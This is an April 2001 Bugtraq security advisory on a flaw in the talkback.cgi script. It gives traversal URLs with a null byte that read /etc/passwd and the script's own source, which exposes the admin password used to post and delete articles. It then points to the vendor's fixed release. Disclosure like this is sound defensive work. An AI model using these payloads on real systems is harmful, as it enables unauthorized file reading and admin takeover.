Date:         Mon, 9 Apr 2001 17:44:23 +0200
From: Stan <stan@WHIZKUNDE.ORG>
Subject:      talkback.cgi vulnerability may allow users to read any file
To: BUGTRAQ@SECURITYFOCUS.COM

[whizkunde security advisory: talkback (CGI)]
http://www.whizkunde.org | stan@whizkunde.org

----------------------------------------------------------
Release date: April 9th 2001
Subject: talkback.cgi security problem
Systems affected: UNIX systems running talkback CGI script
Vendor: http://www.waytotheweb.com
----------------------------------------------------------

1. problem
Talkback.cgi may allow remote users (website visitors) to
view any file on a webserver (depending on the user the
webserver is running on).

Regard this URL:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1

This will display the /etc/passwd (if the webserver user has
access to this file).

Another URL can display the source of talkback.cgi itself
that contains the admin password:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1

(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00, this depends on where the
cgi-bin is installed.)

In this file you can find $admin_password that can be used in

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

to post & delete articles.

2. fix
Way To The Web has released an updated version of
talkback.cgi that isn't vulnerable to this problem:

http://www.waytotheweb.com/webscripts/talkback.htm

----------------------------------------------------------
Stan a.k.a. ThePike
stan@whizkunde.org
http://www.whizkunde.org

Copyright whizkunde security team 2001